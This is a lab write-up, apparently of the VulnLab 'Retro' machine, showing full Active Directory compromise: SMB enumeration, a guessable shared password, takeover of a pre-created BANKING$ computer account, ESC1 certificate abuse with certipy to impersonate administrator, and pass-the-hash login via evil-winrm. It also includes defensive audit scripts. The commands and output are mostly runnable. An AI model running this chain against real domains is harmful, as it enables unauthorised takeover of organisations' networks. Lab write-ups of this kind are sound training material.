vulnlab-retro
Let’s start with an Nmap scan.
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ cat ports_retro.txt
# Nmap 7.94SVN scan initiated Mon Jun  3 18:51:15 2024 as: nmap -Pn -sC -sV -oN ports_retro.txt 10.10.95.159
Nmap scan report for 10.10.95.159
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-03 16:51:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-03T16:52:44+00:00; -1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-03T16:52:04+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-06-02T16:49:49
|_Not valid after:  2024-12-02T16:49:49
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
|   date: 2024-06-03T16:52:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  3 18:52:46 2024 -- 1 IP address (1 host up) scanned in 91.24 seconds
LDAP enum
➜ retro ldapsearch -x -H ldap://retro.vl -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#

#
dn:
namingContexts: DC=retro,DC=vl
namingContexts: CN=Configuration,DC=retro,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=retro,DC=vl
namingContexts: DC=DomainDnsZones,DC=retro,DC=vl
namingContexts: DC=ForestDnsZones,DC=retro,DC=vl
Try a null (anonymous) bind:
➜ retro ldapsearch -x -H ldap://retro.vl -s sub -b 'DC=retro,DC=vl'
# extended LDIF
#
# LDAPv3
# base <DC=retro,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1
Authentication is required for anything beyond the root DSE.
SMB
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --shares
SMB   dc.retro.nl   445   DC   [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB   dc.retro.nl   445   DC   [+] retro.vl\guest:
SMB   dc.retro.nl   445   DC   [+] Enumerated shares
SMB   dc.retro.nl   445   DC   Share      Permissions   Remark
SMB   dc.retro.nl   445   DC   -----      -----------   ------
SMB   dc.retro.nl   445   DC   ADMIN$                   Remote Admin
SMB   dc.retro.nl   445   DC   C$                       Default share
SMB   dc.retro.nl   445   DC   IPC$       READ          Remote IPC
SMB   dc.retro.nl   445   DC   NETLOGON                 Logon server share
SMB   dc.retro.nl   445   DC   Notes
SMB   dc.retro.nl   445   DC   SYSVOL                   Logon server share
SMB   dc.retro.nl   445   DC   Trainees   READ
impacket-smbclient guest@retro -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Trainees
# ls
drw-rw-rw-          0  Mon Jul 24 00:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        288  Mon Jul 24 00:16:11 2023 Important.txt
# cat important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords. So we decided to bundle every one of you up into one account. Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins
RID-Brute.
Simple check: does username equal password for the shared trainee account?
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee'
SMB   dc.retro.nl   445   DC   [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB   dc.retro.nl   445   DC   [+] retro.vl\trainee:trainee
Enumerate the shares again, now with credentials:
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --shares
SMB   dc.retro.nl   445   DC   [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB   dc.retro.nl   445   DC   [+] retro.vl\trainee:trainee
SMB   dc.retro.nl   445   DC   [+] Enumerated shares
SMB   dc.retro.nl   445   DC   Share      Permissions   Remark
SMB   dc.retro.nl   445   DC   -----      -----------   ------
SMB   dc.retro.nl   445   DC   ADMIN$                   Remote Admin
SMB   dc.retro.nl   445   DC   C$                       Default share
SMB   dc.retro.nl   445   DC   IPC$       READ          Remote IPC
SMB   dc.retro.nl   445   DC   NETLOGON   READ          Logon server share
SMB   dc.retro.nl   445   DC   Notes      READ
SMB   dc.retro.nl   445   DC   SYSVOL     READ          Logon server share
SMB   dc.retro.nl   445   DC   Trainees   READ
impacket-smbclient trainee:trainee@retro.vl
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Notes
# ls
drw-rw-rw-          0  Mon Jul 24 00:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        248  Mon Jul 24 00:05:56 2023 ToDo.txt
# cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software it is finally time to clean up the mess they made. We should start with the pre created computer account. That one is older than me.

Best
James
I found a great blog post by TrustedSec explaining how to abuse pre-created computer accounts. First, a RID brute with the trainee credentials to find the account the note refers to:
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --rid-brute
SMB   dc.retro.nl   445   DC   [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB   dc.retro.nl   445   DC   [+] retro.vl\trainee:trainee
SMB   dc.retro.nl   445   DC   [+] Brute forcing RIDs
SMB   dc.retro.nl   445   DC   498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB   dc.retro.nl   445   DC   500: RETRO\Administrator (SidTypeUser)
SMB   dc.retro.nl   445   DC   501: RETRO\Guest (SidTypeUser)
SMB   dc.retro.nl   445   DC   502: RETRO\krbtgt (SidTypeUser)
SMB   dc.retro.nl   445   DC   512: RETRO\Domain Admins (SidTypeGroup)
SMB   dc.retro.nl   445   DC   513: RETRO\Domain Users (SidTypeGroup)
SMB   dc.retro.nl   445   DC   514: RETRO\Domain Guests (SidTypeGroup)
SMB   dc.retro.nl   445   DC   515: RETRO\Domain Computers (SidTypeGroup)
SMB   dc.retro.nl   445   DC   516: RETRO\Domain Controllers (SidTypeGroup)
SMB   dc.retro.nl   445   DC   517: RETRO\Cert Publishers (SidTypeAlias)
SMB   dc.retro.nl   445   DC   518: RETRO\Schema Admins (SidTypeGroup)
SMB   dc.retro.nl   445   DC   519: RETRO\Enterprise Admins (SidTypeGroup)
SMB   dc.retro.nl   445   DC   520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB   dc.retro.nl   445   DC   521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB   dc.retro.nl   445   DC   522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB   dc.retro.nl   445   DC   525: RETRO\Protected Users (SidTypeGroup)
SMB   dc.retro.nl   445   DC   526: RETRO\Key Admins (SidTypeGroup)
SMB   dc.retro.nl   445   DC   527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB   dc.retro.nl   445   DC   553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB   dc.retro.nl   445   DC   571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB   dc.retro.nl   445   DC   572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB   dc.retro.nl   445   DC   1000: RETRO\DC$ (SidTypeUser)
SMB   dc.retro.nl   445   DC   1101: RETRO\DnsAdmins (SidTypeAlias)
SMB   dc.retro.nl   445   DC   1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB   dc.retro.nl   445   DC   1104: RETRO\trainee (SidTypeUser)
SMB   dc.retro.nl   445   DC   1106: RETRO\BANKING$ (SidTypeUser)
SMB   dc.retro.nl   445   DC   1107: RETRO\jburley (SidTypeUser)
SMB   dc.retro.nl   445   DC   1108: RETRO\HelpDesk (SidTypeGroup)
SMB   dc.retro.nl   445   DC   1109: RETRO\tblack (SidTypeUser)
Pre-created computer accounts created with the "Assign this computer account as a pre-Windows 2000 computer" checkbox ticked get a password equal to the computer account name in lowercase, without the trailing $ (so BANKING$ would have the password "banking"). Note the difference between the two results below: the correct password returns STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT (the account exists and the password matched, but a pre-created machine account cannot log on this way), while a wrong password returns STATUS_LOGON_FAILURE.
crackmapexec smb retro.vl -u 'BANKING$' -p 'banking'
SMB   retro.vl   445   DC   [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB   retro.vl   445   DC   [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

crackmapexec smb retro.vl -u 'BANKING$' -p 'bankings'
SMB   retro.vl   445   DC   [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB   retro.vl   445   DC   [-] retro.vl\BANKING$:bankings STATUS_LOGON_FAILURE
To change the computer account's password we can use the impacket-changepasswd script. The article also mentions doing the change over RPC (SAMR) rather than over SMB, because the SMB method results in errors; impacket-changepasswd supports this with the -p rpc-samr flag.
impacket-changepasswd 'retro.vl/BANKING$':banking@retro.vl -newpass Password12345 -dc-ip 10.10.106.112 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
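From the defender's side, the interesting question is how to find objects like BANKING$ before someone else does. The script below is an added example for this write-up (not code from the original post, TrustedSec or Impacket): it audits a list of LDAP-style records for computer objects that still carry the PASSWD_NOTREQD flag typical of a pre-created account and have never logged on. The SAMPLE_ENTRIES records are constructed for the demo, and the logonCount filter is my own heuristic, not something the write-up states.

```python
"""Audit computer objects for the pre-created, pre-Windows 2000 state.

Added example; works on a list of dicts shaped like LDAP search results
(sAMAccountName, userAccountControl, logonCount). SAMPLE_ENTRIES is
constructed for the demo and is not data from the lab.
"""

# userAccountControl bits, as documented by Microsoft (MS-SAMR / MS-ADTS).
UF_PASSWD_NOTREQD = 0x0020
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000

# An account pre-created with the "pre-Windows 2000" box ticked is typically
# created with userAccountControl 4128 = WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD.
PRECREATED_UAC = UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD


def default_pre2000_password(sam_account_name: str) -> str:
    """The password such an account starts with: the account name in
    lowercase without the trailing '$' (the rule the write-up relies on)."""
    return sam_account_name.rstrip("$").lower()


def is_computer(entry: dict) -> bool:
    """Workstation or DC trust accounts are computer objects."""
    uac = int(entry.get("userAccountControl", 0))
    return bool(uac & (UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT))


def is_likely_precreated(entry: dict) -> bool:
    """PASSWD_NOTREQD on a computer object that has never logged on.
    The logonCount == 0 part is a heuristic added here to cut noise: a machine
    that has joined and logged on has already rotated its own password."""
    if not is_computer(entry):
        return False
    uac = int(entry.get("userAccountControl", 0))
    never_used = int(entry.get("logonCount", 0)) == 0
    return bool(uac & UF_PASSWD_NOTREQD) and never_used


def audit(entries: list) -> list:
    """Return one finding per suspicious computer object."""
    findings = []
    for e in entries:
        if is_likely_precreated(e):
            findings.append({
                "sAMAccountName": e["sAMAccountName"],
                "userAccountControl": int(e["userAccountControl"]),
                "remediation": "delete the stale object, or reset its password "
                               "and join the machine promptly",
            })
    return findings


# Constructed sample, modelled loosely on the objects seen in the RID brute.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC$",      "userAccountControl": 532480, "logonCount": 250},
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128,   "logonCount": 0},
    {"sAMAccountName": "WS01$",    "userAccountControl": 4096,   "logonCount": 12},
    {"sAMAccountName": "trainee",  "userAccountControl": 512,    "logonCount": 3},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_ENTRIES):
        print(finding)
```

Feeding it real data is a matter of running an LDAP search for objectClass=computer with the three attributes and passing the results in; the 4128 value is the signature to alert on, and the fix is simply not to leave pre-created objects sitting unjoined.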
ADCS check
I always first sync the system clock with the DC, since Kerberos rejects tickets when the clock skew is too large.
┌──(puck㉿kali)-[~]
└─$ sudo ntpdate retro.vl
2024-06-03 19:23:00.526214 (+0200) -1.338499 +/- 0.011652 retro.vl 10.10.108.116 s1 no-leap
CLOCK: time stepped by -1.338499
┌──(puck㉿kali)-[~]
└─$ certipy-ad find -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Now look for vulnerable templates:
➜ retro certipy-ad find -vulnerable -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
As we can see, certipy-ad has flagged one template as vulnerable to ESC1. ESC1 allows us to request a certificate and supply the subject alternative name (SAN) ourselves, here in the form of a UPN; this is possible because the template has the EnrolleeSuppliesSubject flag set, allows client authentication, and Domain Computers (which includes our BANKING$ account) can enroll. We can use certipy-ad again to request a certificate for the administrator.
certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 16
Unfortunately, this failed with CERTSRV_E_KEY_LENGTH, which means the public key does not meet the minimum size required by the certificate template. Looking back at the certipy output, the RetroClients template requires a minimum RSA key length of 4096 bits, while certipy's default key is smaller. Fortunately, certipy-ad allows us to set the RSA key length with the -key-size flag.
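Certipy's ESC1 verdict and the CERTSRV_E_KEY_LENGTH rejection both come from evaluating template settings. The block below is an added example for this write-up (not code from the original post or from Certipy) that applies the ESC1 conditions to a template record and mirrors the CA's minimum-key-size check. RETRO_CLIENTS is built by hand from the certipy output above; the dict keys and function names are my own, not Certipy's data model, and hardened() shows the one setting a defender would change to close the finding.

```python
"""Evaluate a certificate template for the ESC1 pattern Certipy flagged.

Added example; RETRO_CLIENTS is transcribed from the certipy output in
the write-up, with my own field names. Nothing here talks to a CA.
"""

# EKUs that let a certificate authenticate to AD (the ESC1 precondition).
AUTH_EKUS = {
    "Client Authentication",
    "PKINIT Client Authentication",
    "Smart Card Logon",
    "Any Purpose",
}

# Principals that any user or any machine account in the domain satisfies.
LOW_PRIV_PRINCIPALS = {
    "Authenticated Users", "Domain Users", "Domain Computers", "Everyone",
}

RETRO_CLIENTS = {
    "name": "RetroClients",
    "enabled": True,
    "enrollee_supplies_subject": True,      # Certificate Name Flag
    "eku": ["Client Authentication"],        # Extended Key Usage
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "min_rsa_key_length": 4096,
    "enrollment_rights": [
        "RETRO.VL\\Domain Admins",
        "RETRO.VL\\Domain Computers",
        "RETRO.VL\\Enterprise Admins",
    ],
}


def low_priv_enrollers(template: dict) -> list:
    """Enrollment principals that effectively include every user or machine."""
    return sorted(
        p for p in template["enrollment_rights"]
        if p.split("\\")[-1] in LOW_PRIV_PRINCIPALS
    )


def is_esc1(template: dict):
    """Apply the ESC1 conditions in turn. Returns (vulnerable, reason)."""
    if not template["enabled"]:
        return False, "template is not published"
    if not template["enrollee_supplies_subject"]:
        return False, "subject and SAN are built from AD, not supplied by the enrollee"
    ekus = set(template["eku"])
    if ekus and not (ekus & AUTH_EKUS):   # an empty EKU list means any purpose
        return False, "no authentication EKU, so the certificate cannot log on"
    if template["requires_manager_approval"]:
        return False, "manager approval blocks unattended issuance"
    if template["authorized_signatures_required"] > 0:
        return False, "an enrollment agent signature is required"
    enrollers = low_priv_enrollers(template)
    if not enrollers:
        return False, "only privileged principals hold enrollment rights"
    return True, f"{', '.join(enrollers)} can enroll and choose the SAN"


def key_length_accepted(template: dict, requested_bits: int) -> bool:
    """Mirror the CA's CERTSRV_E_KEY_LENGTH check: the request's RSA key
    must be at least the template minimum."""
    return requested_bits >= template["min_rsa_key_length"]


def hardened(template: dict) -> dict:
    """Copy of the template with the setting that closes ESC1 flipped:
    let AD build the subject instead of trusting the enrollee."""
    fixed = dict(template)
    fixed["enrollee_supplies_subject"] = False
    return fixed


if __name__ == "__main__":
    print(is_esc1(RETRO_CLIENTS))
    print(is_esc1(hardened(RETRO_CLIENTS)))
    print("2048-bit request accepted:", key_length_accepted(RETRO_CLIENTS, 2048))
```

Requiring manager approval or removing Domain Computers from the enrollment rights would also clear the check; clearing EnrolleeSuppliesSubject is the smallest change because the other conditions are legitimate for a client-auth template.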
certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
This works. We can now use the auth module of certipy to get a valid TGT as administrator; it also recovers the account's NT hash along the way.
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.108.116
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': *******************************:*******************************
We now have an administrator certificate and the NT hash recovered from it, which we can use to authenticate to the domain controller.
┌──(puck㉿kali)-[~]
└─$ evil-winrm -i retro.vl -u 'Administrator' -H '<REDACTED>'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC
That’s all.